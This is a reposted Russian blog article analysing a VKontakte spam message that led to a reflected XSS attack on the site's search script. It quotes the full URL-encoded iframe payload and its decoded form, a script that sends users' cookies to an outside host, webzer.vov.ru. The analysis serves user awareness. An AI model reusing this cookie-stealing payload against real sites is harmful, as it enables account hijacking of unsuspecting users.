| Главная » Статьи » Статьи из Интернета » Разное |
|
Смотрю текст сообщения, разосланного от моего имени: привет, этo не cпам!раccылаю этo cooбщение вcем cвoим друзьям.я cегoдня удалю cвoю cтраничку вкoнтакте,дocтал cпам oкoнчательнo.Так чтo,еcли чтo-тo будет нужнo,либo звoни\пиши на мoбильник,либo ищи меня здеcь http://odnonochniki.?tk/,там xoтя бы cпама нету) ,я пoд cвoей фамилией и имнем.вoт так. И тут понимаю, что мое природное любопытство подвело меня и в этот раз. Вчера аналогичное сообщение пришло мне, ну и естественно, сидя на опере, чуствуя себя в безопасности я перешел по этой ссылке. А теперь заходим на эту страничку (из незалогиненного браузера!), и смотрим код. Что же мы видим? В коде подгружается скрытый плавающий фрейм: <iframe src='http://%76%6b%6f%6e%74%61%6b%74%65%2e%72%75/gsearch.php?q=%27;()())//\%27;document.write(String.fromCharCode(60,115,99,114,105,112,116,62,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,101,98,122,101,114,46,118,111,118,46,114,117,47,115,46,112,104,112,63,100,99,61,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,43,39,34,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,59,34,62,60,47,105,102,114,97,109,101,62,39,41,59,60,47,115,99,114,105,112,116,62))//%22;%3C%3E%22)//\%22;%3C%3E%22%3C%3E%22%22!---%22?%3E#c[q]=%27%3B()())%20%20\&c[section]=people' style='display:none;'></iframe> Ссылка ведет на заURLencode-нный «vkontakte.ru», к скрипту, выполняющему поиск. Как известно, после процедуры поиска текст запроса выводится обратно пользователю, этим (а также отсутствием должной фильтрации) и воспользовались спамеры в данном случае. В строку запроса внедряется Javascript-код, в данном случае это закодированый в ASCII код еще одного фрейма: <script>document.write('<iframe src="http://webzer.vov.ru/s.php?dc='+document.cookie+'" style="display:none;"></iframe>');</script> Это собственно и есть снифер, на который и улетают куки вконтакта некоторых любопытных пользователей типа меня. Уязвимость актуальна на момент написания, простой алерт (проверено под оперой) демонстрирует это. В IE не работает, т.к. там нет поддержки протокола «data:», а я не специалист по написанию эксплоитов. Некоторые выводы Не ходить по левым ссылкам. Безопасный браузер ничего не гарантирует (в данном случае это XSS-уязвимость на «крупнейшем сайте рунета»), а вот бдительность усыпляет Источник: http://habrahabr.ru/blogs/infosecurity/62283/ | |
| Просмотров: 747 | Комментарии: 1 | |
| Всего комментариев: 0 | |